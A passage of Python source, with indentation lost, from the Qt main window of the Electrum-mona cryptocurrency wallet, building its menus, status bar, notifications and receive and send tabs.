self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
if self.wallet.has_lightning():
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
if self.wallet.has_lightning():
tools_menu.addAction(_("&Lightning"), self.gui_object.show_lightning_dialog)
tools_menu.addAction(_("&Watchtower"), self.gui_object.show_watchtower_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum-mona.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum-mona.org")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Discord"), lambda: webopen("https://discord.gg/vWyjJ7r"))
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('monacoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-mona",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Electrum-mona's icon from oimo at askmona.") + "\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-mona - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-mona", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-mona", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.lnworker:
l = self.wallet.lnworker.get_balance()
text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_channels_tab(self, wallet):
#self.channels_list = ChannelsList(self)
#t = self.channels_list.get_toolbar()
#return self.create_list_tab(self.channels_list, t)
return
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', 3600)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('On-chain'))
self.create_invoice_button.setIcon(read_QIcon("monacoin.png"))
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=230)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
self.receive_widgets = QTabWidget()
self.receive_widgets.addTab(self.receive_qr, 'QR Code')
self.receive_widgets.addTab(self.receive_address_e, 'Text')
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(self.receive_widgets)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_request(self, key):
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', 3600)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
self.address_list.update()
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
def create_bitcoin_request(self, amount, message, expiration):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, title, content):
self.app.clipboard().setText(content)
self.show_message(_(f"{title} copied to clipboard:\n\n{content}"))
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def clear_receive_tab(self):
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
def update_receive_qr(self):
uri = str(self.receive_address_e.text())
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
# note: 'addr' could be ln invoice or BIP21 URI
try:
uri = util.parse_URI(addr)
except InvalidBitcoinURI:
pass
else:
addr = uri.get('address')
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
self.feecontrol_fields = QWidget()
vbox_feecontrol = QVBoxLayout(self.feecontrol_fields)
vbox_feecontrol.setContentsMargins(0, 0, 0, 0)
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addWidget(self.feecontrol_fields, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
